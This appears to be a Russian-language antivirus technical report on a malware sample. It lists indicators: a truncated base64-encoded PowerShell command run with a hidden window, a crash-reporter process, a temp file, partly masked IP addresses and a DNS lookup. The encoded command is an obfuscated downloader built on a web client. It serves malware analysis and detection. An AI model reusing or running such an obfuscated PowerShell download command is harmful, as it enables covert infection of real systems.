Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABxADQAQQBRAG8ARABDAFoAPQAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAG8ANABCAEEAJwAsACcAagBBACcAKQA7ACQAWgBDADQAWABEAHcAPQBuAGAAZQBgAFcAYAAtAE8AYgBKAGUAQwB0ACAAKAAnAE4AZQAnACsAJwB0AC4AVwBlAGIAQwBsAC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1548
- %TEMP%\1199210.cvr
- '14#.#43.246.120':80
- '12#.#07.82.20':80
- '16#.#27.44.216':80
- '12#.#07.52.98':80
- DNS ASK co####odavinci.pe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABxADQAQQBRAG8ARABDAFoAPQAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAG8ANABCAEEAJwAsACcAagBBACcAKQA7ACQAWgBDADQAWABEAHcAPQBuAGAAZQBgAFcAYAAtAE8AYgBKAGUAQwB0ACAAKAAnAE4AZQAnACsAJwB0AC4AVwBlAGIAQwBsAC...' (со скрытым окном)